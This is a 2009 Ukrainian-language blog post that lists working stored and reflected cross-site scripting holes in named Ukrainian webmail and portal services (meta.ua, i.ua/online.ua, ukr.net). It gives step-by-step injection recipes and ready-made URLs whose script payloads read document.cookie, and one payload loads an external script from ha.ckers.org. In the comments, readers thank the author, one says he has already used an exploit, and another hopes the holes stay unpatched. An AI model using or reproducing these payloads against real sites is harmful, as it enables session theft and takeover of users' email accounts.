Home > Безпека > xss на українських почтовиках

xss на українських почтовиках

September 12th, 2009 poma Leave a comment Go to comments

декілька активних та пасивних ксс на українскьких почтовиках “http://meta.ua/favicon.icometa.ua“, “http://i3.i.ua/favicon.icoi.ua” та “http://www.ukr.net/favicon.icoukr.net“..

http://meta.ua/favicon.ico

meta.ua


активка1:
в вхідних > печать

  • http://webmail.meta.ua/compose.php?newMessage=true&mailbox=INBOX
  • Кому: blabla@meta.ua
       Тема: <img src=’http://uasc.org.ua/favicon.ico’ onload=alert(document.cookie);>
  • “Отправить”
  • коли лист прийде жертві, вона повинна нажати відкрити його, і нажати “Версия для печати”, спрацює xss

активка2:

  • http://contact.meta.ua/ > “Моя Сторiнка”
  • “Виконавцi:” >> “Редагувати” >> “Додати”
  • “Виконавець/група” >> <img src=”http://uasc.org.ua/favicon.ico” onload=alert(document.cookie);>
  • повертаємося на “Моя Сторiнка”

пасивки:

  • BlackPanther:
       http://contact.meta.ua/register/”><script>alert(1)</script>
  • BlackPanther:
       http://chat.meta.ua/index.php?user_lang=&sauth=”><script>alert(1)</script>




http://i3.i.ua/favicon.ico

i.ua


пасивки:

  • http://index.online.ua/?q=”><script>alert(document.cookie);</script>
  • http://travel.online.ua/search/search.php?tt=pk&frmCountryID=115&frmCityID=&fRegID=1&dts=19.09.2009&dte=26.09.2009&len=7-9&frmAcmd=dbl&frmTransport=&hcat=&frmPriceTo=http%3A%2F%2Findex.online.ua%2F%3Fq%3D%22%3E<script>alert(document.cookie);</script>&x=73&y=10

не ксс:

  • http://play.online.ua/?cat=casualpcgames&act=genre&code[]=tetris-lines




http://www.ukr.net/favicon.ico

ukr.net



активка1:

  • http://freemail.ukr.net/…/q/userinfo
  • Имя: “><img src=”http://uasc.org.ua/favicon.ico” onload=alert(1)>

пасивки:

  • http://job.ukr.net/vacancy/?Keywords=</title><SCRIPT SRC=//ha.ckers.org/.j>
  • http://play.ukr.net/videos/search?text=”><script>alert(document.cookie);</script>”
  • http://kino.ukr.net/adlink.php?url=javascript:alert(1);&m=3770&c=&p=
       * тільки в Опері
Categories: Безпека Tags: ,
  1. September 13th, 2009 at 00:00 | #1

    О спс за хсс.Надеюсь не прикроют. Мего респект

  2. September 13th, 2009 at 20:42 | #2

    Класна підбірка! Я вже одну вдало використав! ;)

  3. September 13th, 2009 at 22:05 | #3

    >> Класна підбірка! Я вже одну вдало використав!
    ти би ше 0777 поставив на то шо я прошу вже тиждень, було би просто супер ;)

  4. September 14th, 2009 at 17:43 | #5

    ZEXEL: +1
    молодець! добавив ксс’шки в список =)

  5. November 20th, 2009 at 03:58 | #6

    Активка на укр.нет не працює ((

  1. No trackbacks yet.